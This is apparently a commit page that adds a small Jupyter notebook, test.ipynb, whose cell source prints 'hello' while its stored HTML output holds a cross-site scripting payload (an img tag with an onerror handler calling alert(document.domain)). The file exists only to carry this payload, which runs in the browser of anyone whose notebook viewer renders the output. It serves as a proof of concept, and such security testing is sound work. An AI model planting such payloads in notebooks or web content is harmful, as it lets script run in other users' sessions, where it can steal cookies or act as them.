upload notebook
Browse files- test.ipynb +19 -0
test.ipynb
ADDED
|
@@ -0,0 +1,19 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
{
|
| 2 |
+
"cells": [
|
| 3 |
+
{
|
| 4 |
+
"cell_type": "code",
|
| 5 |
+
"outputs": [
|
| 6 |
+
{
|
| 7 |
+
"output_type": "display_data",
|
| 8 |
+
"data": {
|
| 9 |
+
"text/html": "<img src=x onerror=alert(document.domain)>"
|
| 10 |
+
}
|
| 11 |
+
}
|
| 12 |
+
],
|
| 13 |
+
"source": ["print('hello')"]
|
| 14 |
+
}
|
| 15 |
+
],
|
| 16 |
+
"metadata": {"kernelspec": {"display_name": "Python 3"}},
|
| 17 |
+
"nbformat": 4,
|
| 18 |
+
"nbformat_minor": 5
|
| 19 |
+
}
|